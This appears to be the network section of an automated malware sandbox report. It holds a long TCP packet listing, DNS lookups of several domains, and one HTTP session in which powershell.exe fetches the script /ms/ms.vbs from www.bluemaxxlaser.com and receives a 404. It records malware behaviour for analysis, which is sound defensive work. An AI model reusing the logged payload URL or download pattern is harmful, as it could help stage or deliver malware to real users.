                                                                                            Dec 19, 2024 12:48:25.245935917 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.272264957 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.272281885 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.272408962 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.272418022 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.272528887 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.392276049 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.392296076 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.392815113 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.392832041 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.392884970 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.412106037 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.412123919 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.415473938 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.415482044 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.415632963 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.428515911 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.428533077 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.428662062 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.428662062 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.428672075 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.428867102 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.447376013 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.447392941 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.447521925 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.447529078 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.447848082 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.466274023 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.466291904 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.467475891 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.467482090 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.467631102 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.484226942 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.484241962 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.487483978 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.487494946 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.487576962 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.502648115 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.502665043 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.503475904 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.503483057 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.503571033 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.589665890 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.589694023 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.589766026 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.589773893 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.589826107 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.605504990 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.605528116 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.605602980 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.605609894 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.605654955 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.617749929 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.617767096 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.619472027 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.619477987 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.619532108 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.629842997 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.629877090 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.629946947 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.629952908 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.629993916 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.641042948 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.641067028 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.641134977 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.641141891 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.641184092 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.653003931 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.653024912 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.654855013 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.654861927 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.654922962 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.663683891 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.663702965 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.663789034 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.663794994 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.663868904 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.675172091 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.675194979 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.675472975 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.675478935 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.675540924 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.782119036 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.782140017 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.782224894 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.782241106 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.782340050 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.789489985 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.789505959 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.789648056 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.789654970 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.789808035 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.797666073 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.797683001 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.797861099 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.797868013 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.797918081 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.805453062 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.805469990 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.806051970 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.806058884 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.807328939 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.813456059 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.813472033 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.813571930 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.813577890 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.813673019 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.821006060 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.821024895 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.821069002 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.821075916 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.821239948 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.827641964 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.827657938 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.827760935 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.827768087 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.827855110 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.835397005 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.835412979 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.835618019 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.835623980 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.836055994 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.973051071 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.973068953 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.973197937 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.973197937 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.973210096 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.973310947 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.979537010 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.979553938 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.979612112 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.979628086 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.979674101 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.979720116 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.987257004 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.987272978 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.987418890 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.987426043 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.987488985 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.993494034 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.993510962 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.993609905 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:25.993617058 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:25.993685961 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.001290083 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.001307964 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.001607895 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.001615047 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.001671076 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.007586002 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.007601976 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.007667065 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.007673025 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.007827997 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.013915062 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.013930082 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.015475988 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.015482903 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.015558958 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.021282911 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.021297932 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.023406982 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.023413897 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.023498058 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.166992903 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.167059898 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.167095900 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.167124987 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.167157888 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.167198896 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.173934937 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.173986912 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.174026012 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.174052954 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.174081087 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.174101114 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.180879116 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.180932999 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.180983067 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.180999041 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.181041956 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.181073904 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.186587095 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.186631918 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.186670065 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.186688900 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.186722040 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.186743021 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.193176985 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.193255901 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.193298101 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.193316936 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.193366051 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.193408966 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.199671030 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.199723959 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.199765921 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.199785948 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.199831009 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.199860096 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.206687927 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.206734896 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.206773043 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.206790924 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.206828117 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.206860065 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.213968992 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.214029074 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.214047909 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.214066982 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.214106083 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.214128971 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.358021975 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.358088017 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.358129025 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.358139038 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.358200073 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.364504099 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.364553928 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.364586115 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.364597082 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.364650011 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.371514082 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.371562004 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.371597052 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.371607065 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.371660948 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.378818035 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.378868103 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.378906012 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.378915071 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.378998041 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.385343075 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.385365963 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.385412931 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.385420084 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.385477066 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.392693996 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.392712116 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.392782927 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.392793894 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.392852068 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.398932934 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.398953915 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.399018049 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.399028063 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.399070978 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.406011105 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.406034946 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.406105042 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.406116962 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.406169891 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.545116901 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.545192003 CET44349701107.161.23.150192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.545196056 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.545257092 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.547899008 CET49701443192.168.2.7107.161.23.150
                                                                                            Dec 19, 2024 12:48:26.837202072 CET4970380192.168.2.7203.175.174.69
                                                                                            Dec 19, 2024 12:48:26.957345963 CET8049703203.175.174.69192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.957449913 CET4970380192.168.2.7203.175.174.69
                                                                                            Dec 19, 2024 12:48:26.957551956 CET4970380192.168.2.7203.175.174.69
                                                                                            Dec 19, 2024 12:48:27.077528954 CET8049703203.175.174.69192.168.2.7
                                                                                            Dec 19, 2024 12:48:28.492311001 CET8049703203.175.174.69192.168.2.7
                                                                                            Dec 19, 2024 12:48:28.541239977 CET4970380192.168.2.7203.175.174.69
                                                                                            Dec 19, 2024 12:48:29.194247007 CET4970380192.168.2.7203.175.174.69

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 19, 2024 12:48:22.963988066 CET5684153192.168.2.71.1.1.1
                                                                                            Dec 19, 2024 12:48:23.101795912 CET53568411.1.1.1192.168.2.7
                                                                                            Dec 19, 2024 12:48:26.693870068 CET5394053192.168.2.71.1.1.1
                                                                                            Dec 19, 2024 12:48:26.831950903 CET53539401.1.1.1192.168.2.7
                                                                                            Dec 19, 2024 12:48:41.235964060 CET6308853192.168.2.71.1.1.1
                                                                                            Dec 19, 2024 12:49:04.603641033 CET6443053192.168.2.71.1.1.1

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Dec 19, 2024 12:48:22.963988066 CET192.168.2.71.1.1.10x450Standard query (0)www.astenterprises.com.pkA (IP address)IN (0x0001)false
                                                                                            Dec 19, 2024 12:48:26.693870068 CET192.168.2.71.1.1.10x204bStandard query (0)www.bluemaxxlaser.comA (IP address)IN (0x0001)false
                                                                                            Dec 19, 2024 12:48:41.235964060 CET192.168.2.71.1.1.10x89cbStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                            Dec 19, 2024 12:49:04.603641033 CET192.168.2.71.1.1.10x6ddbStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Dec 19, 2024 12:48:23.101795912 CET1.1.1.1192.168.2.70x450No error (0)www.astenterprises.com.pkastenterprises.com.pkCNAME (Canonical name)IN (0x0001)false
                                                                                            Dec 19, 2024 12:48:23.101795912 CET1.1.1.1192.168.2.70x450No error (0)astenterprises.com.pk107.161.23.150A (IP address)IN (0x0001)false
                                                                                            Dec 19, 2024 12:48:26.831950903 CET1.1.1.1192.168.2.70x204bNo error (0)www.bluemaxxlaser.com203.175.174.69A (IP address)IN (0x0001)false
                                                                                            Dec 19, 2024 12:48:34.769428015 CET1.1.1.1192.168.2.70x403fNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Dec 19, 2024 12:48:34.769428015 CET1.1.1.1192.168.2.70x403fNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                            Dec 19, 2024 12:48:34.769428015 CET1.1.1.1192.168.2.70x403fNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                            Dec 19, 2024 12:48:34.769428015 CET1.1.1.1192.168.2.70x403fNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                            Dec 19, 2024 12:48:34.769428015 CET1.1.1.1192.168.2.70x403fNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                            Dec 19, 2024 12:48:41.467456102 CET1.1.1.1192.168.2.70x89cbNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                            Dec 19, 2024 12:49:04.919697046 CET1.1.1.1192.168.2.70x6ddbNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                            Dec 19, 2024 12:49:16.706294060 CET1.1.1.1192.168.2.70xa514No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                            Dec 19, 2024 12:49:16.706294060 CET1.1.1.1192.168.2.70xa514No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                            Dec 19, 2024 12:49:40.820089102 CET1.1.1.1192.168.2.70xa21aNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                            Dec 19, 2024 12:49:40.820089102 CET1.1.1.1192.168.2.70xa21aNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                            Dec 19, 2024 12:50:05.117175102 CET1.1.1.1192.168.2.70x2df9No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                            Dec 19, 2024 12:50:05.117175102 CET1.1.1.1192.168.2.70x2df9No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • www.astenterprises.com.pk
                                                                                            • www.bluemaxxlaser.com

                                                                                            HTTP Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.749703203.175.174.69807272C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Dec 19, 2024 12:48:26.957551956 CET80OUTGET /ms/ms.vbs HTTP/1.1
                                                                                            Host: www.bluemaxxlaser.com
                                                                                            Connection: Keep-Alive
                                                                                            Dec 19, 2024 12:48:28.492311001 CET516INHTTP/1.1 404 Not Found
                                                                                            Date: Thu, 19 Dec 2024 11:48:28 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 315
                                                                                            Keep-Alive: timeout=5, max=100
                                                                                            Connection: Keep-Alive
